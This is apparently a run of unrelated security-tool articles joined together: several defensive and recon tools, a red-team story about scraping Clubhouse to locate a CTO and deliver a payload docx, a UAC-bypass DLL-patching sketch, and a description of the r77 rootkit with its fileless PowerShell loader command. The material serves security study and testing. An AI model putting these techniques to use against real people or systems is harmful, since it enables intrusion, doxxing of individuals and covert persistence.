
VAST - Visibility Across Space And Time



The network telemetry engine for data-driven security investigations.


Getting Started | Installation | Documentation | Development | Changelog | License and Scientific Use

Chat with us on Gitter, or join us on Matrix at #tenzir_vast:gitter.im.


Key Features
  • High-Throughput Ingestion: ingest numerous log formats at over 100k events/second, including Zeek, Suricata, JSON, and CSV.

  • Low-Latency Queries: sub-second response times over the entire data lake, thanks to multi-level bitmap indexing and actor model concurrency. Particularly helpful for instant indicator checking over the entire dataset.

  • Flexible Export: access data in common text formats (ASCII, JSON, CSV), in binary form (MRT, PCAP), or via zero-copy relay through Apache Arrow for arbitrary downstream analysis.

  • Powerful Data Model and Query Language: the generic semi-structured data model allows for expressing complex data in a typed fashion. An intuitive query language that feels like grep and awk at scale enables powerful subsetting of data with domain-specific operations, such as top-k prefix search for IP addresses and subset relationships (an example query follows this list).

  • Schema Pivoting: the missing link to navigate between related events, e.g., extracting a PCAP for a given IDS alert, or locating all related logs for a given query.
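
For instance, a subnet query using the same operators that appear in the Getting Started examples below (a sketch only; the exact type extractor depends on your schemas):

vast export json ':addr in 10.0.0.0/8'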


Get VAST

Linux users can download our latest static binary release via browser or cURL.

curl -L -O https://storage.googleapis.com/tenzir-public-data/vast-static-builds/vast-static-latest.tar.gz

Unpack the archive. It contains three folders: bin, etc, and share. To get started, invoke the binary in the bin directory directly.

tar xfz vast-static-latest.tar.gz
bin/vast --help

To install VAST properly for your local user, simply place the unpacked folders in /usr/local/.

FreeBSD and macOS users have to build from source. Clone the master branch to get the most recent version of VAST.

git clone --recursive https://github.com/tenzir/vast

Once you have all dependencies in place, build VAST with the following commands:

./configure
cmake --build build
cmake --build build --target test
cmake --build build --target integration
cmake --build build --target install

The installation guide contains more detailed and platform-specific instructions on how to build and install VAST.


Getting Started

Here are some commands to get a first glimpse of what VAST can do for you.

Start a VAST node:

vast start

Ingest Zeek logs of various kinds:

zcat *.log.gz | vast import zeek

Run a query over the last hour, rendered as JSON:

vast export json ':timestamp > 1 hour ago && (6.6.6.6 || 5353/udp)'

Ingest a PCAP trace with a 1024-byte flow cutoff:

vast import pcap -c 1024 < trace.pcap

Run a query over PCAP data, sort the packets by time, and feed them into tcpdump:

vast export pcap "sport > 60000/tcp && src !in 10.0.0.0/8" \
| ipsumdump --collate -w - \
| tcpdump -r - -nl

License and Scientific Use

VAST comes with a 3-clause BSD license. When referring to VAST in a scientific context, please use the following citation:

@InProceedings{nsdi16:vast,
  author    = {Matthias Vallentin and Vern Paxson and Robin Sommer},
  title     = {{VAST: A Unified Platform for Interactive Network Forensics}},
  booktitle = {Proceedings of the USENIX Symposium on Networked Systems
               Design and Implementation (NSDI)},
  month     = {March},
  year      = {2016}
}

You can download the paper from the NSDI '16 proceedings.

Developed with ❤️ by Tenzir




Short story about Clubhouse user scraping and social graphs



TL;DR

During this RedTeam engagement, the Hexway team used Clubhouse as a social engineering tool to find out more about their client's employees.


UPDATE:

While Hexway was preparing this article for publication, cybernews.com reported: 1.3 million scraped user records leaked online for free.

In this research, Hexway didn't attack Clubhouse users and didn't exploit any Clubhouse vulnerabilities.



Intro

Hi!

RedTeam projects have long been routine for many pentest companies. At Hexway, we don't do them often, only because our main focus is our collaborative pentesting platform, Hive. But in this case, we couldn't resist: the project seemed very interesting.

We won’t go into detail on the project itself but rather focus on one of its parts. So, in this ReadTeam testing, our goal was to compromise the computer of the CTO of a large financial organization, X corp. To achieve that, we needed the CTO to open a docx file with our payload. Naturally, the question was: what’s the best way to deliver that file?

Here are some obvious options:
  • Corporate email
  • LinkedIn
  • Facebook

Instead, we wanted to try something new. And that’s where Clubhouse comes in.


Clubhouse? What?!

Clubhouse is a voice-based social network. It was popular for a couple of weeks in February 2021.

At that time, Clubhouse offered us a few advantages:
  • Huge popularity
  • Users mostly sign up with their real names, photos, and links to other social media
  • It's quite easy to get into a room with interesting people, who are often hard to reach through traditional channels like email, LinkedIn, etc.
  • Our experience tells us that people are suspicious of cold emails with attachments and don't open them. But in the context of an informal social platform, they seem to be less alert, which is good for RedTeam.

  • Here’s the plan:
  • Sign up in Clubhouse
  • Find our target in Clubhouse
  • Wait until they participate in a room as a speaker
  • Join the room
  • Try to engage them in a conversation. Get them interested and move the conversation over to email
  • Send them an email with the attachment and payload
  • The target opens our docx
  • Profit!


First problems

First, we registered in Clubhouse. That was easy! Then we looked for our target … and found nothing. We couldn't find them by their name or by their nicknames from other platforms. Unfortunately, you can't search users by profile description or by Twitter/Instagram account. So, are they not on Clubhouse? Or maybe they have an Android? (At the time of writing, 06.04.21, Clubhouse was officially available only for iOS.)


This is the way!

Okay, chin up. Our target could be using a fake name to avoid revealing themselves, and participating only in rooms dedicated to non-work-related topics. It's time to find out. Let's try the power of social graphs.

Here’s the new plan: - Find any X corp employee - Get their list of followers and their accounts - Get the list of users they follow and their accounts - Get the lists of users of the clubs these accounts are in - Filter all these users by “X corp” in the About profile section - Make social graphs to find our target in someone’s connections + invitation chains (down to the first Clubhouse users) + “following” connections + “follower” connections

To do all that, we have to parse Clubhouse. There's no official API, so we used an unofficial one (thanks to stypr!).

The clubhouse-py library is pretty easy to use, and we could set up a parser script in no time. Clubhouse returns the following JSON in response to the get_profile API request (a crawler sketch follows the JSON below).

Warning! To demonstrate how graphs work, we’re not going to use real X corp employees’ data.

{
  "user_profile":{
    "user_id":4,
    "name":"Rohan Seth",
    "displayname":"",
    "photo_url":"https://clubhouseprod.s3.amazonaws.com:443/4_b471abef-7c14-43af-999a-6ecd1dd1709c",
    "username":"rohan",
    "bio":"Cofounder at Clubhouse 👋🏽 (this app!) and Lydian Accelerator 🧬 (non profit for fixing genetic diseases)",
    "twitter":"rohanseth",
    "instagram":"None",
    "num_followers":5502888,
    "num_following":636,
    "time_created":"2020-03-17T07:51:28.085566+00:00",
    "follows_me":false,
    "is_blocked_by_network":false,
    "mutual_follows_count":0,
    "mutual_follows":[],
    "notification_type":3,
    "invited_by_user_profile":"None",
    "invited_by_club":"None",
    "clubs":[],
    "url":"https://www.joinclubhouse.com/@rohan",
    "can_receive_direct_payment":true,
    "direct_payment_fee_rate":0.029,
    "direct_payment_fee_fixed":0.3
  },
  "success":true
}
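
Here is the kind of crawler loop this boils down to (a minimal sketch built on stypr's clubhouse-py; the Clubhouse constructor arguments, method names and response keys are assumptions based on that library, and networkx stands in for our own graph code):

import networkx as nx
from clubhouse import Clubhouse  # stypr's clubhouse-py (unofficial API)

# Authenticated client; the tokens come from the library's phone-number login flow.
client = Clubhouse(user_id="...", user_token="...", user_device="...")
graph = nx.DiGraph()

def crawl(user_id, keyword="x corp"):
    """Add one user and their first page of connections to the graph,
    then return every profile seen so far whose bio mentions the keyword."""
    profile = client.get_profile(user_id)["user_profile"]
    graph.add_node(user_id, name=profile["name"], bio=profile.get("bio") or "")
    # Follower/following lists are paged; one page is enough for a sketch.
    for u in client.get_followers(user_id, page_size=50, page=1).get("users", []):
        graph.add_edge(u["user_id"], user_id)   # follower -> user
    for u in client.get_following(user_id, page_size=50, page=1).get("users", []):
        graph.add_edge(user_id, u["user_id"])   # user -> followed account
    return [n for n, d in graph.nodes(data=True)
            if keyword in d.get("bio", "").lower()]

Repeating this over followers-of-followers and club member lists is what eventually yields the user base described below.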

Example 1. Get information about the user chipik, all of their followers, and the accounts they follow.

 ~python3 clubhouse-graphs.py -u chipik --followers --following
|------------|-----------|-------------|--------------------------------------------------------------------------------------------|----------|------------------------|---------|-----------|-----------|-----------|------------|-----------------|
| user_id | name | displayname | photo_url | username | bio | twitter | instagram | followers | following | invited by | invited by name |
|------------|-----------|-------------|--------------------------------------------------------------------------------------------|----------|------------------------|---------|-----------|-----------|-----------|------------|-----------------|
| 1964245387 | Dmitry Ch | | https://clubhouseprod.s3.amazonaws.com:443/1964245387_428c3161-1d0e-456e-b2a7-66f82b143094 | chipik | - hacker | _chipik | | 110 | 96 | 854045411 | Al Fova |
| | | | | | - researcher | | | | | | |
| | | | | | - speaker | | | | | | |
| | | | | | | | | | | | |
| | | | | | Do things at hexway.io | | | | | | |
| | | | | | tg: @chpkk | | | | | | |
|------------|-----------|-------------|--------------------------------------------------------------------------------------------|----------|------------------------|---------|-----------|-----------|-----------|------------|-----------------|

Example 2. Get the list of the participants of “Cybersecurity Club”

~python3 clubhouse-graphs.py --group 444701692
[INFO ] Getting info about group Cybersecurity Club
[INFO ] Adding member: 1/750
[INFO ] Adding member: 2/750
...
[INFO ] Adding member: 749/750
Done!
Check file ch-group-444701692.html with group's users graph

That's a graph of all the group members. When hovering over a node, we see information about the user.



We’ve experimented with server request frequency to see if there are any request limits. A few times, we were temporarily blocked for “too frequent use of API”, but the block expired quickly. For all the time we spent testing, our account wasn’t permanently blocked.
A few days later, we had a base of 300,000 Clubhouse users somehow connected to X corp.
Now, we can search users by different patterns in their bio:

Example 3. Find all users who allegedly work or have worked at WIRED magazine, plus their followers and the accounts they follow.

~python3 clubhouse-graphs.py --find_by_bio wired
[INFO ] Searching users with wired in bio
[INFO ] Adding 1/100
[INFO ] Adding 2/100
...
[INFO ] Adding 100/100
Done!
Find graph in ch-search-wired.html file

Here's the interactive graph with user profiles.

(Figure: interactive graph of users matching "wired")


Example 4. Clubhouse invitation chain

To sign up in Clubhouse, you need an invitation from a Clubhouse user. We can use that fact as additional evidence of connections between accounts.

~ python3 clubhouse-graphs.py -I kevinmitnick
[INFO ] Getting invite graph for user kevinmitnick
Kevin Mitnick<--Maite Robles
Maite Robles<--Roni Broyde
Roni Broyde<--Alex Eick
Alex Eick<--Summer Elsayed
Summer Elsayed<--Dena Mekawi
Dena Mekawi<--Eric Parker
Eric Parker<--Global Mogul Chale
Kojo Terry Oppong<--Shaka Senghor
Shaka Senghor<--Andrew Chen
Done! Find graph in ch-invitechain-kevinmitnick.html file

Here’s the interactive graph of invitations leading us to Kevin Mitnick.

(Figure: the invitation chain leading to Kevin Mitnick)
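
Reconstructing such a chain needs nothing more than the invited_by_user_profile field returned by get_profile (see the JSON above). A minimal sketch, reusing the hypothetical client from the earlier snippet:

def invite_chain(user_id):
    """Follow invited_by_user_profile links until an early user
    with no recorded inviter is reached."""
    chain = []
    while user_id:
        profile = client.get_profile(user_id)["user_profile"]
        chain.append(profile["name"])
        inviter = profile.get("invited_by_user_profile")
        # The field is the string "None" (not null) when there is no inviter.
        user_id = inviter["user_id"] if isinstance(inviter, dict) else None
    return chain  # e.g. ["Kevin Mitnick", "Maite Robles", ...]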

Results

We collected the users, filtered them by employer, and built a graph showing the connections between them (followers, followed, invitations). This surfaced a user with a dog on a scooter as their profile picture and no bio. This user is followed by almost all of the X corp employees we found, but follows just one of them. Finally, the user's name contained the target's initials, so we felt safe assuming it was them.

The hardest part was done. We followed the target from one account and used another to engage them in conversation in a small room.

Some social engineering magic, and we got their email address. After a short exchange of letters, we sent them the docx with a payload. A few hours later, we got a shell on their laptop. Done!

Takeaways

  • Do not limit yourself to “standard” social engineering channels.
  • Be careful with the information you put out on social media, especially if it concerns your current or previous employment.
  • Most likely, the peak popularity of Clubhouse has passed. But there are still a lot of users with real data that can be parsed easily. All of this makes us think that someone could already have collected a database of Clubhouse users, and some time later it may end up leaked.
P.S. The scripts developed during this project are available in our repository: Clubhouse dummy parser and graph generator (CDPaGG).











APSoft-Web-Scanner-v2 - Powerful Dork Searcher And Vulnerability Scanner For Windows Platform



APSoft Webscanner Version 2

The new version of APSoft Webscanner Version 1.







What can I do with this?

With this software, you can search your dorks in the supported search engines and scan the grabbed URLs to find their vulnerabilities. In addition, you can generate dorks, scan URLs, and search dorks separately whenever you want.


Supported search engines
  • Google
  • Yahoo
  • Bing

Supported vulnerabilities
  • SQL Injection
  • XSS
  • LFI

What's new in version 2 (most important updates)?

Adding custom payloads

You can edit the payloads.json file, which is created once you open and close the software, and add as many payloads as you want; easier than drinking water.


Adding custom error checks

Once a payload is injected into a URL, the software looks for errors in the new page source. You can customize those errors too: simply edit the payloadserror.json file, which is created once you open and close the software. You can also use regexes as errors, in the REIT|your regex here format.
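
Appending entries from a script instead of by hand might look like this (a sketch only: the article doesn't document the JSON schema of these files, so a flat list of strings is assumed; the REIT| prefix marking a regex is taken from the description above):

import json

PATH = "payloadserror.json"  # created after the first open/close of the software

with open(PATH) as f:
    errors = json.load(f)  # assumed (undocumented) schema: a flat JSON list of error strings

errors.append("You have an error in your SQL syntax")       # plain substring check
errors.append("REIT|(warning|fatal error):.*on line \\d+")  # regex check, REIT| format

with open(PATH, "w") as f:
    json.dump(errors, f, indent=2)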


Multi vulnerability check

In the old version you could not select more than one vulnerability to check; in v2 you can do this easily.


Multi search engine grabber

In the old version you could not select more than one search engine to search in; in v2 you can do this easily.


Memory management

We've added memory management to avoid exhausting the memory on your system.


Dork generator

You can generate and save dorks very quickly with your custom configurations and keywords. A valid configuration must contain {DORK}, which is replaced with each keyword during dork generation.
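
The substitution itself is simple; a sketch of the behaviour described above (the configuration, keywords, and file name are made up for illustration):

# Each {DORK} placeholder in the configuration is replaced with a keyword.
config = "inurl:{DORK} ext:php"            # hypothetical configuration
keywords = ["login", "admin", "upload"]    # hypothetical keyword list

dorks = [config.replace("{DORK}", kw) for kw in keywords]
with open("generated_dorks.txt", "w") as f:
    f.write("\n".join(dorks))
# -> inurl:login ext:php, inurl:admin ext:php, inurl:upload ext:php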


updates list (all)
  • New threading system based on Microsoft Tasks
  • Uses LINQ
  • Dork generator
  • Ability to add regexes as payload errors
  • Low resource usage
  • Moved from WPF to Windows Forms (just because my designs are bad; contact me if you can do better)
  • Ability to use the scanner and grabber separately or simultaneously
  • and ...

support / suggestion = ph09nixom@gmail.com - t.me/ph09nix

Leave a STAR if you found this useful :)


ByeIntegrity-UAC - Bypass UAC By Hijacking A DLL Located In The Native Image Cache



Bypass User Account Control (UAC) to gain elevated (Administrator) privileges to run any program at a high integrity level. 


Requirements
  • Administrator account
  • UAC notification level set to default or lower

How it works

ByeIntegrity hijacks a DLL located in the Native Image Cache (NIC). The NIC is used by the .NET Framework to store optimized .NET Assemblies that have been generated from programs like Ngen, the .NET Framework Native Image Generator. Because Ngen is usually run under the current user with Administrative privileges through the Task Scheduler, the NIC grants modify access for members of the Administrators group.

The Microsoft Management Console (MMC) Windows Firewall Snap-in uses the .NET Framework, and upon initializing it, modules from the NIC are loaded into the MMC process. The MMC executable uses auto-elevation, a mechanism Windows uses to automatically elevate a process's token without a UAC prompt.

ByeIntegrity hijacks a specific DLL located in the NIC named Accessibility.ni.dll. It writes some shellcode into an appropriately-sized area of padding located in the .text section of the DLL. The entry point of the DLL is then updated to point to the shellcode. Upon DLL load, the entry point (which is actually the shellcode) is executed. The shellcode calculates the address of kernel32!CreateProcessW, creates a new instance of cmd.exe running as an Administrator, and then simply returns TRUE. This is only for the DLL_PROCESS_ATTACH reason; all other reasons will immediately return TRUE.
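
To make the mechanics concrete, here is a rough sketch of that patching idea using Python's pefile library (illustrative only; ByeIntegrity itself is native code, and locating an appropriately-sized padding run is glossed over with a hypothetical offset and placeholder shellcode):

import pefile

pe = pefile.PE("Accessibility.ni.dll")
text = next(s for s in pe.sections if s.Name.rstrip(b"\x00") == b".text")

# Hypothetical: raw file offset of a padding run inside .text large enough
# to hold the shellcode (the real tool searches for one).
padding_raw_offset = 0x1234
shellcode = b"\x90" * 64  # placeholder for the CreateProcessW shellcode

pe.set_bytes_at_offset(padding_raw_offset, shellcode)

# Repoint the entry point (an RVA) at the shellcode.
rva = text.VirtualAddress + (padding_raw_offset - text.PointerToRawData)
pe.OPTIONAL_HEADER.AddressOfEntryPoint = rva
pe.write("Accessibility.ni.patched.dll")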


UACMe

This attack is implemented in UACMe as method #63. If you want to try out this attack, please use UACMe first. The attack is the same; however, UACMe uses a different method to modify the NIC. ByeIntegrity uses IFileOperation while UACMe uses ISecurityEditor. In addition, UACMe chooses the correct Accessibility.ni.dll for your system and performs the system maintenance tasks if necessary (to generate the NIC components). ByeIntegrity simply chooses the first NIC entry that exists (which may or may not be the entry that MMC is using) and does not run the system maintenance tasks. ByeIntegrity contains significantly more code than UACMe, so reading the UACMe implementation will be much easier than reading the ByeIntegrity code. Lastly, ByeIntegrity launches a child process during the attack whereas UACMe does not.

tl;dr: UACMe is simpler and more effective than ByeIntegrity, so use UACMe first.


Using the code

If you’re reading this then you probably know how to compile the source. Just note that this hasn’t been tested or designed with x86 in mind at all, and it probably won’t work on x86 anyways.

Just like UACMe, I will never upload compiled binaries to this repo. There are always people who want the world to crash and burn, and I'm not going to provide an easy route for them to run this on somebody else's computer and cause intentional damage. I also don't want script-kiddies to use this attack without understanding what it does and the damage it can cause.


Supported Versions

This attack works from Windows 7 (7600) up until the latest version of Windows 10.



Snuffleupagus - Security Module For Php7 And Php8 - Killing Bugclasses And Virtual-Patching The Rest!



Security module for php7 and php8 - Killing bugclasses and virtual-patching the rest!

Snuffleupagus is a PHP 7+ and 8+ module designed to drastically raise the cost of attacks against websites by killing entire bug classes. It also provides a powerful virtual-patching system, allowing administrators to fix specific vulnerabilities and audit suspicious behaviour without having to touch the PHP code.


Key Features

Download

We've got a download page, where you can find packages for your distribution, but you can of course just git clone this repo, or check the releases on github.


Examples

We provide various example rules, which look like this:

# Harden the `chmod` function
sp.disable_function.function("chmod").param("mode").value_r("^[0-9]{2}[67]$").drop();

# Mitigate command injection in `system`
sp.disable_function.function("system").param("command").value_r("[$|;&`\\n]").drop();

Upon violation of a rule, you should see lines like this in your logs:

[snuffleupagus][0.0.0.0][disabled_function][drop] The execution has been aborted in /var/www/index.php:2, because the return value (0) of the function 'strpos' matched a rule.

Documentation

We've got a comprehensive website with all the documentation that you could possibly wish for. You can of course build it yourself.


Thanks

Many thanks to the Suhosin project for being a huge source of inspiration, and to all our contributors.



3klCon - Automation Recon Tool Which Works With Large And Medium Scope



Full Automation Recon tool which works with Small and Medium scopes.

It's recommended to run it on a VPS; it will discover secrets and search for vulnerabilities.

So, welcome, and let's dive into it <3


Updates

Version 1.1, what's new? (Very recommended)
  1. Fixed multiple issues with the tools used.
  2. Upgraded to Python 3
  3. Edited the tool's methodology; you can check it there :)
  4. Changed the selection of tools: swapped some out and added more
  5. Made some processes user options, like directory bruteforcing and port scanning

Installation instructions

1. Before ANY installation instructions: you MUST be the ROOT user

$ su -

Because some tools and dependencies need root permissions.


2. Install the required tools (you MUST run this even if you have already installed the tools used)

chmod +x install_tools.sh

./install_tools.sh


3. Run the tool (preferred to use python2, not python3)

python 3klcon.py -t target.com


4. Check that you have the latest version of Go installed, because some tools require it to be up to date!

Notes

[+] If you face any problem during the installation process, check that:

1. You are logged in as the ROOT user, not a normal user
2. You have installed the Go language and the path /root/go/bin exists

[+] It will take almost 5-6 hours to run if your target is medium-sized, so be patient, or use a VPS and sleep while it runs :)

[+] It will collect all the results into one directory named after your target

[+] Some tools may need your interaction, like entering your GitHub 2FA code, username, password, etc.


Tools used
  1. Subfinder
  2. Assetfinder
  3. Altdns
  4. Dirsearch
  5. Httpx
  6. Waybackurls
  7. Gau
  8. Git-hound
  9. Gitdorks.sh
  10. Naabu
  11. Gf
  12. Gf-templates
  13. Nuclei
  14. Nuclei-templates
  15. Subjack
  16. Port_scan.sh

Stay in touch <3

LinkedIn | Blog | Twitter



R77-Rootkit - Fileless Ring 3 Rootkit With Installer And Persistence That Hides Processes, Files, Network Connections, Etc...



Ring 3 rootkit

r77 is a ring 3 rootkit that hides the following entities from all processes:

  • Files, directories, junctions, named pipes, scheduled tasks
  • Processes
  • CPU usage
  • Registry keys & values
  • Services
  • TCP & UDP connections

It is compatible with Windows 7 and Windows 10 in both x64 and x86 editions.


Hiding by prefix

All entities where the name starts with "$77" are hidden.



Configuration System

The dynamic configuration system allows hiding processes by PID and by name, file system items by full path, TCP & UDP connections on specific ports, etc.



The configuration is stored in HKEY_LOCAL_MACHINE\SOFTWARE\$77config and is writable by any process without elevated privileges. The DACL of this key is set to grant full access to any user.

The $77config key is hidden when RegEdit is injected with the rootkit.
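
Because the key lives at a fixed, world-writable path, inspecting it from a clean system (or before the rootkit hides it from your process) is straightforward; a minimal sketch using only the documented key path, with the subkey layout left as configuration-dependent:

import winreg

# Enumerate the r77 configuration key described above.
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\$77config")
i = 0
while True:
    try:
        print(winreg.EnumKey(key, i))  # configuration subkeys (hidden PIDs, names, ports, ...)
        i += 1
    except OSError:  # raised when there are no more subkeys
        break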


Installer

r77 is deployable using a single file "Install.exe". It installs the r77 service that starts before the first user is logged on. This background process injects all currently running processes, as well as processes that spawn later. Two processes are needed to inject both 32-bit and 64-bit processes. Both processes are hidden by ID using the configuration system.

Uninstall.exe removes r77 from the system and gracefully detaches the rootkit from all processes.


Child process hooking

When a process creates a child process, the new process is injected before it can run any of its own instructions. The function NtResumeThread is always called when a new process is created. Therefore, it's a suitable target to hook. Because a 32-bit process can spawn a 64-bit child process and vice versa, the r77 service provides a named pipe to handle child process injection requests.

In addition, there is a periodic check every 100ms for new processes that might have been missed by child process hooking. This is necessary because some processes are protected and cannot be injected, such as services.exe.


In-memory injection

The rootkit DLL (r77-x86.dll and r77-x64.dll) can be injected into a process from memory and doesn't need to be stored on the disk. Reflective DLL injection is used to achieve this. The DLL provides an exported function that when called, loads all sections of the DLL, handles dependency loading and relocations, and finally calls DllMain.


Fileless persistence

The rootkit resides in the system memory and does not write any files to the disk. This is achieved in multiple stages.

Stage 1: The installer creates two scheduled tasks, for the 32-bit and the 64-bit r77 service. A scheduled task does require a file to be stored, named $77svc32.job or $77svc64.job, which is the only exception to the fileless concept. However, scheduled tasks are also hidden by prefix once the rootkit is running.

The scheduled tasks start powershell.exe with the following command line:

[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)

The command is inline and does not require a .ps1 script. Here, the .NET Framework capabilities of PowerShell are utilized in order to load a C# executable from the registry and execute it in memory. Because the command line has a maximum length of 260 (MAX_PATH), there is only enough room to perform a simple Assembly.Load().EntryPoint.Invoke().




Stage 2: The executed C# binary is the stager. It will create the r77 service processes using process hollowing. The r77 service is a native executable compiled in both 32-bit and 64-bit separately. The parent process is spoofed and set to winlogon.exe for additional obscurity. In addition, the two processes are hidden by ID and are not visible in the task manager.



No executables or DLLs are ever stored on the disk. The stager is stored in the registry and loads the r77 service executable from its resources.

The PowerShell and .NET dependencies are present in a fresh installation of Windows 7 and Windows 10. Please review the documentation for a complete description of the fileless initialization.


Hooking

Detours is used to hook several functions from ntdll.dll. These low-level syscall wrappers are called by any WinAPI or framework implementation.

  • NtQuerySystemInformation
  • NtResumeThread
  • NtQueryDirectoryFile
  • NtQueryDirectoryFileEx
  • NtEnumerateKey
  • NtEnumerateValueKey
  • EnumServiceGroupW
  • EnumServicesStatusExW
  • NtDeviceIoControlFile

The only exception is advapi32.dll. Two functions are hooked to hide services. This is because the actual service enumeration happens in services.exe, which cannot be injected.


Test environment

The Test Console can be used to inject r77 to or detach r77 from individual processes.



Technical Documentation

Please read the technical documentation to get a comprehensive and full overview of r77 and its internals, and how to deploy and integrate it.


Project Page

bytecode77.com/r77-rootkit



Mubeng - An Incredibly Fast Proxy Checker And IP Rotator With Ease



An incredibly fast proxy checker & IP rotator with ease.

Features
  • Proxy IP rotator: rotates your IP address for every specific request.
  • Proxy checker: checks which of your proxy IPs are still alive.
  • All HTTP/S methods are supported.
  • HTTP & SOCKSv5 proxy protocols are supported.
  • All parameters & URIs are passed through.
  • Easy to use: just run it against your proxy file and choose the action you want!
  • Cross-platform: whether you are on Windows, Linux, macOS, or even a Raspberry Pi, you can run it very well.

Why mubeng?

It's fairly simple, there is no need for additional configuration.

mubeng has two core functions:


1. Run a proxy server as a proxy IP rotator

This is useful to avoid different kinds of IP bans, e.g. bruteforce protection, API rate-limiting, or IP-based WAF blocking. We also leave it entirely up to the user to source proxy pool resources from anywhere.


2. Perform proxy checks

So, you don't need any extra proxy checking tools out there if you want to check your proxy pool.


Installation

Binary

Simply download a pre-built binary from the releases page and run it!


Docker

Pull the Docker image by running:

▶ docker pull kitabisa/mubeng

Source

Using Go (v1.15+) compiler:

▶ GO111MODULE=on go get -u ktbs.dev/mubeng/cmd/mubeng
NOTE: The same command above also works for updating.

— or

Manually build the executable from source:

▶ git clone https://github.com/kitabisa/mubeng
▶ cd mubeng
▶ make build
▶ (sudo) mv ./bin/mubeng /usr/local/bin
▶ make clean

Usage

For usage, it's always required to provide your proxy list, whether it is used to check or as a proxy pool for your proxy IP rotation.


Basic
▶ mubeng [-c|-a :8080] -f file.txt [options...]

Options

Here are all the options it supports.

▶ mubeng -h
Flag | Description
-f, --file <FILE> | Proxy file.
-a, --address <ADDR>:<PORT> | Run proxy server.
-d, --daemon | Daemonize proxy server.
-c, --check | Perform a proxy live check.
-t, --timeout | Max. time allowed for proxy server/check (default: 30s).
-r, --rotate <AFTER> | Rotate proxy IP for every AFTER request (default: 1).
-v, --verbose | Dump HTTP requests/responses or show dead proxies during checks.
-o, --output | Log output from proxy server or live check.
-u, --update | Update mubeng to the latest stable version.
-V, --version | Show current mubeng version.

NOTES:
  • Rotations are counted for all requests, even if the request fails.
    • Rotation means a random pick, NOT choosing the next proxy in sequence from the pool. We do not track whether a proxy has already been used, so there is no guarantee that your proxy IP will have rotated by the time your requests reach the N value (-r/--rotate).
  • Daemon mode (-d/--daemon) will install mubeng as a service on the system (Linux/macOS) or set up a callback (Windows).
    • Hence you can control the service with the journalctl, service, or net (for Windows) commands to start/stop the proxy server.
    • Whenever you activate daemon mode, it forcibly stops and uninstalls any existing mubeng service, then re-installs and starts it as a daemon.
  • Verbose mode (-v/--verbose) and timeout (-t/--timeout) apply to both the proxy check and proxy IP rotation actions.
  • HTTP traffic requests and responses are displayed when verbose mode (-v/--verbose) is enabled, but
    • we DO NOT explicitly display the request/response body, and
    • all cookie values in headers are redacted automatically.
  • If you use the output option (-o/--output) to run the proxy IP rotator, request/response headers are NOT written to the log file.
  • A timeout option (-t/--timeout) value is a possibly signed sequence of decimal numbers, each with an optional fraction and a unit suffix, such as "5s", "300ms", "-1.5h" or "2h45m" (see the example below).
    • Valid time units are "ns", "us" (or "µs"), "ms", "s", "m", and "h".
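
For example, to run a proxy check with a five-second timeout per proxy (flags as documented above):

▶ mubeng -f proxies.txt --check -t 5s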

Examples

For example, say you have a proxy pool (proxies.txt) such as:

http://127.0.0.1:8080
https://127.0.0.1:3128
socks5://127.0.0.1:2121
...
...

Because we use auto-switch transport, mubeng can accept multiple proxy protocol schemes at once.
Please refer to the documentation for this package.


Proxy checker

Pass --check flag in command to perform proxy checks:

▶ mubeng -f proxies.txt --check --output live.txt

The above case also uses the --output flag to save the live proxies from the checking results into a file (live.txt).


(Figure: Checking proxies mubeng with max. 5s timeout)


Proxy IP rotator

Furthermore, if you wish to run the proxy IP rotator with the proxies that were still alive in the earlier check results (live.txt), or with your own list, use the -a (--address) flag instead to run the proxy server:

▶ mubeng -a localhost:8089 -f live.txt -r 10

The -r (--rotate) flag rotates your IP for every N requests, where N is the value you provide (here, 10).


(Figure: Running mubeng as proxy IP rotator with verbose mode)


Burp Suite Upstream Proxy

If you want to use mubeng (the proxy IP rotator) as an upstream proxy in Burp Suite, sitting between Burp Suite and the internet, you don't need any additional Burp Suite extensions. To demonstrate this:


(Figure: Settings Burp Suite Upstream Proxy to mubeng)

In your Burp Suite instance, select the Project options menu and click the Connections tab. In the Upstream Proxy Servers section, check Override user options, then press the Add button to add your upstream proxy rule. After that, fill in the required fields (Destination host, Proxy host & Proxy port) with the correct details. Click OK to save the settings.


OWASP ZAP Proxy Chain

This acts the same way as using an upstream proxy. OWASP ZAP allows you to connect to another proxy for outgoing connections in an OWASP ZAP session. To chain it with a mubeng proxy server:


(Figure: Settings proxy chain connection in OWASP ZAP to mubeng)

Select Tools in the menu bar of your ZAP session window, then select the Options (shortcut: Ctrl+Alt+O) submenu and go to the Connection section. In that window, scroll to the Use proxy chain part, then check Use an outgoing proxy server. After that, fill in the required fields (Address/Domain Name & Port) with the correct details. Click OK to save the settings.


Limitations

Currently, IP rotation runs the proxy server over the HTTP protocol only, not SOCKSv5, even if the resources you have are SOCKSv5. In other words, a SOCKSv5 resource you provide is still used properly, because the client uses auto-switch transport, but the proxy server itself DOES NOT speak anything other than HTTP.


Contributors

This project exists thanks to all the people who contribute. To learn how to setup a development environment and for contribution guidelines, see CONTRIBUTING.md.


Pronunciation

jv_ID/mo͞oˌbēNG/— mubeng-mubeng nganti mumet. (ꦩꦸꦧꦺꦁ​ꦔꦤ꧀ꦠꦶ​ꦩꦸꦩꦺꦠ꧀)


Changes

For changes, see CHANGELOG.md.




Httpx - A Fast And Multi-Purpose HTTP Toolkit Allows To Run Multiple Probers Using Retryablehttp Library, It Is Designed To Maintain The Result Reliability With Increased Threads



httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probers using the retryablehttp library; it is designed to maintain result reliability with an increased number of threads.


Features
  • Simple and modular code base making it easy to contribute.
  • Fast and fully configurable flags to probe multiple elements.
  • Supports multiple HTTP-based probings.
  • Smart automatic fallback from HTTPS to HTTP by default.
  • Supports hosts, URLs, and CIDR as input.
  • Handles edge cases with retries, backoffs, etc. to deal with WAFs.

Supported probes:

Probes | Default check | Probes | Default check
URL | true | IP | true
Title | true | CNAME | true
Status Code | true | Raw HTTP | false
Content Length | true | HTTP2 | false
TLS Certificate | true | HTTP 1.1 Pipeline | false
CSP Header | true | Virtual host | false
Location Header | true | CDN | false
Web Server | true | Path | false
Web Socket | true | Ports | false
Response Time | true | Request method | false

Installation Instructions

From Binary

The installation is easy. You can download the pre-built binaries for your platform from the Releases page. Extract them using tar, move the binary to your $PATH, and you're ready to go.

Download latest binary from https://github.com/projectdiscovery/httpx/releases

▶ tar -xvf httpx-linux-amd64.tar
